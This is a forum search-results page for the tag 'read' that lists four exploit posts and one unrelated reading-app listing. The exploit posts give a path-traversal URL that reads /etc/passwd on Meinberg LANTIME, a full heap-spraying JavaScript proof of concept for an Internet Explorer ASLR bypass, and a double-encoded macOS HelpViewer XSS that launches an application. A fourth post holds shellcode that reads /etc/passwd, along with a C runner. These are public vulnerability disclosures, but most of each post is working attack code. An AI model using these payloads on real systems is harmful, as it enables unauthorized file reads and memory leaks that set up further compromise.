
Search the forums

Showing results for the tag 'read'.






5 results found

  1. Title: Meinberg LANTIME Web Configuration Utility - Arbitrary File Read
     Author: Jakub Palaczynski
     CVE: CVE-2017-16787

     Exploit tested on:
     ==================
     Meinberg LANTIME Web Configuration Utility 6.16.008

     Vulnerability affects:
     ======================
     All LTOS6 firmware releases before 6.24.004

     Vulnerability:
     **************

     Arbitrary File Read:
     ====================
     It is possible to read an arbitrary file on the system with root permissions.

     Proof of Concept:

     First instance:
     https://host/cgi-bin/mainv2?value=800&showntpclientipinfo=xxx&ntpclientcounterlogfile=/etc/passwd&lcs=xxx

     An Info-User user is able to read any file on the system with root permissions.

     Second instance:
     A user with Admin-User access is able to read any file on the system via the firmware update functionality. Curl accepts the "file" schema, which actually downloads the file from the filesystem. Then it is possible to download the /upload/update file, which contains the content of the requested file.

     Contact:
     ========
     Jakub[dot]Palaczynski[at]gmail[dot]com
  2. Soft-Apple

    Game: 300+ Sight Words, Learn to Read A+ (300+ Sight Words, Learn to Read on the App Store)
  3. <!-- CVE-2015-6086 Out Of Bound Read Vulnerability Address Space Layout Randomization (ASLR) Bypass Improper handling of new line and white space character caused Out of Bound Read in CDOMStringDataList::InitFromString. This flaw can be used to leak the base address of MSHTML.DLL and effectively bypass Address Space Layout Randomization. Affected Version: Internet Explorer 9 Internet Explorer 10 Internet Explorer 11 Test Bed: IE: 10 & 11 KB: KB3087038 OS: Windows 7 SP1 x86 Advisory: http://www.payatu.com/advisory-ie_cdomstringdatalist/ https://technet.microsoft.com/library/security/MS15-112 http://www.zerodayinitiative.com/advisories/ZDI-15-547/ Copyright 2016 © Payatu Technologies Pvt. Ltd. Author: Ashfaq Ansari Email: ashfaq[at]payatu[dot]com Websites: www.payatu.com www.nullcon.net www.hardwear.io www.null.co.in This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. --> <!DOCTYPE html> <html> <head> <title>IE 10-11 Windows 7 SP1 x86 - OOB Read ALSR Bypass PoC</title> <meta http-equiv="pragma" content="no-cache"/> <meta http-equiv="expires" content="0"/> <script type="text/javascript"> /** * This function is used to create string of desired size. * * @param character * @param size * @returns {string} */ function createString(character, size) { while (character.length < size) { character += character; } // BSTR structure // header | unicode string | NULL terminator // 4 bytes | sizeof(string) * 2 | 2 bytes return character.substr(0, (size - 6) / 2); } /** * This function is used to get the Internet Explorer's version. * * @link http://stackoverflow.com/questions/19999388/jquery-check-if-user-is-using-ie * @returns {int | null} */ function getInternetExplorerVersion() { var userAgent = window.navigator.userAgent; var msie = userAgent.indexOf('MSIE'); if (msie > 0) { return parseInt(userAgent.substring(msie + 5, userAgent.indexOf('.', msie)), 10); } var trident = userAgent.indexOf('Trident/'); if (trident > 0) { var rv = userAgent.indexOf('rv:'); return parseInt(userAgent.substring(rv + 3, userAgent.indexOf('.', rv)), 10); } var edge = userAgent.indexOf('Edge/'); if (edge > 0) { return parseInt(userAgent.substring(edge + 5, userAgent.indexOf('.', edge)), 10); } return null; } /** * This function is used to leak the base address of MSHTML.DLL. 
* * @param offsetOfMSHTMLBaseAddress */ function LeakMSHTMLBaseAddress(offsetOfMSHTMLBaseAddress) { // Step 1: Let's do some clean up CollectGarbage(); var eventArray = new Array(); var polyLineArray = new Array(); var exploitSuccessful = false; // Step 2: As the target object is stored in Process Heap // instead of Isolated Heap, we can use any element that // is stored on Process Heap to spray the Heap. // // To create a predictable pattern on Heap, we spray using // "MsGestureEvent" and it's size is 0x0A0. We will use // this object to read the VFTable pointer. for (var i = 0; i < 0x1000; i++) { eventArray[i] = document.createEvent('MsGestureEvent'); } // Step 3: Now we need to create a hole in the allocation // that we made earlier. The purpose of this hole is to // allocate the vulnerable buffer just before the Heap // chunk of "MsGestureEvent" for (i = 1; i < 0x500; i += 2) { eventArray[i] = null; } // Step 4: As Memory Protector is enabled by default on all // versions of IE, it will not allow the free of objects // instantly. So, we need to force free the memory due to // Delayed Frees. CollectGarbage2(); // Step 5: Now, fill the hole that we created earlier. The // "requiredFeatures" property is allocated on OLEAUT32 Cache // Heap, old Plunger technique does not seems to work for me. // I have used a neat trick to bypass OLEAUT32 Cache Heap. for (i = 0; i < 0x250; i++) { polyLineArray[i] = document.createElementNS('http://www.w3.org/2000/svg', 'polyline'); // Step 6: Trick to bypass allocation on OLEAUT32 Cached Heap polyLineArray[i].setAttributeNS(null, 'attrib' + i, createString('A', 0x0A0)); // Step 7: Now, "requiredFeatures" property won't be allocated on OLEAUT32 Cache Heap. polyLineArray[i].setAttributeNS(null, 'requiredFeatures', createString('\n', 0x0A0)); // Step 8: As the whole exploitation depends on certain Heap // layout, thus, this is unreliable. 
But to overcome this // un-reliability, I'm reloading the page until, right Heap // Layout is achieved. // // This PoC is created for the vendor to acknowledge this bug, // hence reliability is not my concern at this moment. We can // make it more reliable, but let's leave it for later stage. // // Some heuristics to detect if Heap is in the right state. // Once we have determined the Heap state, we can apply some // more heuristics. if (polyLineArray[i].requiredFeatures.numberOfItems == 2 && polyLineArray[i].requiredFeatures.getItem(1).length == 4) { // Step 9: Read the Out of Bound memory var OOBReadMemory = escape(polyLineArray[i].requiredFeatures.getItem(1)); // Step 10: Some more heuristics var spitValue = OOBReadMemory.split('%'); var CDOMMSGestureEvent_VFTablePointer = parseInt('0x' + spitValue[3].replace('u', '') + spitValue[2].replace('u', '')); var MSHTMLBaseAddress = CDOMMSGestureEvent_VFTablePointer - offsetOfMSHTMLBaseAddress; // Step 11: Show the message to user var message = 'MSHTML.DLL Base Address: 0x' + MSHTMLBaseAddress.toString(16); message += '\n'; message += 'CDOMMSGestureEvent VFTable Pointer: 0x' + CDOMMSGestureEvent_VFTablePointer.toString(16); alert(message); // Step 12: Exploit successful exploitSuccessful = true; break; } } // Step 13: As stated earlier, this is a bit unreliable. // If the exploit has failed, reload the current page. // If reloading does not help, close the browser and // launch the exploit multiple times. if (!exploitSuccessful) { window.location.reload(); } } /** * This function is used fill the wait list of the freed objects * and trigger Garbage Collection. */ function CollectGarbage2() { // Microsoft implemented Memory Protector to mitigate // Use after Free vulnerabilities. The object protected // by Memory Protector won't be freed directly. Instead, // it will be put into a wait list which will be freed // when it reaches certain threshold (i.e 100,000 bytes). 
var video = new Array(); // Now allocate video element (400 bytes) 250 times // // Note: We are not using stack to store the references. // If we use stack to store the references, the memory // will never be freed during Mark and Reclaim operation for (var i = 0; i < 250; i++) { video[i] = document.createElement('video'); } // Now free the elements. It will be put into the wait list. video = null; // Reclaim the memory by triggering Garbage Collection CollectGarbage(); } /** * This function is used to launch the exploitation by leaking * the base address of MSHTML.DLL. */ function LaunchExploit() { var browserSupported = false; var ieVersion = getInternetExplorerVersion(); var offsetOfMSHTMLBaseAddress = null; if (ieVersion == 11) { // If you are getting a wrong base address, please update this value // offsetOfMSHTMLBaseAddress = VFTableAddress - MSHTMLBaseAddress offsetOfMSHTMLBaseAddress = 0x0002ebe8; browserSupported = true; } else if (ieVersion == 10) { // If you are getting a wrong base address, please update this value // offsetOfMSHTMLBaseAddress = VFTableAddress - MSHTMLBaseAddress offsetOfMSHTMLBaseAddress = 0x0000d270; browserSupported = true; } else { alert('Current browser is not supported!\nExploit Tested on IE10 & 11 (Windows 7 SP1 x86)'); } // Launch the exploit if (browserSupported) { LeakMSHTMLBaseAddress(offsetOfMSHTMLBaseAddress); } } </script> </head> <body onload='LaunchExploit();'> </body> </html>
  4. <!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1040 HelpViewer is an application and using WebView to show a help file. You can see it simply by the command: open /Applications/Safari.app/Contents/Resources/Safari.help or using "help:" scheme: help:openbook=com.apple.safari.help help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest. HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../". PoC: document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)"; The attached poc will pop up a Calculator. Tested on macOS Sierra 10.12.1 (16B2659). --> <script> /* OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read. HelpViewer is an application and using WebView to show a help file. You can see it simply by the command: open /Applications/Safari.app/Contents/Resources/Safari.help or using "help:" scheme: help:openbook=com.apple.safari.help help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest. HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../". 
PoC: document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)"; The attached poc will pop up a Calculator. Tested on macOS Sierra 10.12.1 (16B2659). */ function main() { function second() { var f = document.createElement("iframe"); f.onload = () => { f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app"; }; f.src = "help:openbook=com.apple.safari.help"; document.documentElement.appendChild(f); } var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();"; document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url; } main(); </script>
  5. Hacking

    /* [+] Author : B3mB4m [~] Contact : [email protected] [~] Project : https://github.com/b3mb4m/Shellsploit [~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu #If you want test it, you must compile it within x86 OS. #Or basically you can get it with shellsploit. #Default setthings for /etc/passwd 00000000 31C0 xor eax,eax 00000002 40 inc eax 00000003 743A jz 0x3f 00000005 31C9 xor ecx,ecx 00000007 31C0 xor eax,eax 00000009 31D2 xor edx,edx 0000000B 51 push ecx 0000000C B005 mov al,0x5 0000000E 6873737764 push dword 0x64777373 00000013 68632F7061 push dword 0x61702f63 00000018 682F2F6574 push dword 0x74652f2f 0000001D 89E3 mov ebx,esp 0000001F CD80 int 0x80 00000021 89D9 mov ecx,ebx 00000023 89C3 mov ebx,eax 00000025 B003 mov al,0x3 00000027 66BAFF0F mov dx,0xfff 0000002B 6642 inc dx 0000002D CD80 int 0x80 0000002F 31C0 xor eax,eax 00000031 31DB xor ebx,ebx 00000033 B301 mov bl,0x1 00000035 B004 mov al,0x4 00000037 CD80 int 0x80 00000039 31C0 xor eax,eax 0000003B B001 mov al,0x1 0000003D CD80 int 0x80 0000003F EB3F jmp short 0x80 00000041 5F pop edi 00000042 80770B41 xor byte [edi+0xb],0x41 00000046 48 dec eax 00000047 31C0 xor eax,eax 00000049 0402 add al,0x2 0000004B 48 dec eax 0000004C 31F6 xor esi,esi 0000004E 0F05 syscall 00000050 6681ECFF0F sub sp,0xfff 00000055 48 dec eax 00000056 8D3424 lea esi,[esp] 00000059 48 dec eax 0000005A 89C7 mov edi,eax 0000005C 48 dec eax 0000005D 31D2 xor edx,edx 0000005F 66BAFF0F mov dx,0xfff 00000063 48 dec eax 00000064 31C0 xor eax,eax 00000066 0F05 syscall 00000068 48 dec eax 00000069 31FF xor edi,edi 0000006B 40 inc eax 0000006C 80C701 add bh,0x1 0000006F 48 dec eax 00000070 89C2 mov edx,eax 00000072 48 dec eax 00000073 31C0 xor eax,eax 00000075 0401 add al,0x1 00000077 0F05 syscall 00000079 48 dec eax 0000007A 31C0 xor eax,eax 0000007C 043C add al,0x3c 0000007E 0F05 syscall 00000080 E8BCFFFFFF call dword 0x41 00000085 2F das 00000086 657463 gs jz 0xec 00000089 2F das 0000008A 7061 jo 0xed 0000008C 7373 jnc 0x101 0000008E 7764 ja 
0xf4 00000090 41 inc ecx 00000091 2F das 00000092 657463 gs jz 0xf8 00000095 2F das 00000096 7061 jo 0xf9 00000098 7373 jnc 0x10d 0000009A 7764 ja 0x100 */ //Project : https://github.com/b3mb4m/Shellsploit //This file created with shellsploit .. //19/01/2016 - 00:29:31 //Compile : gcc -fno-stack-protector -z execstack shell.c -o shell unsigned char shellcode[] = "\x31\xc0\x40\x74\x3a\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"; int main(void){ (*(void(*)()) shellcode)(); }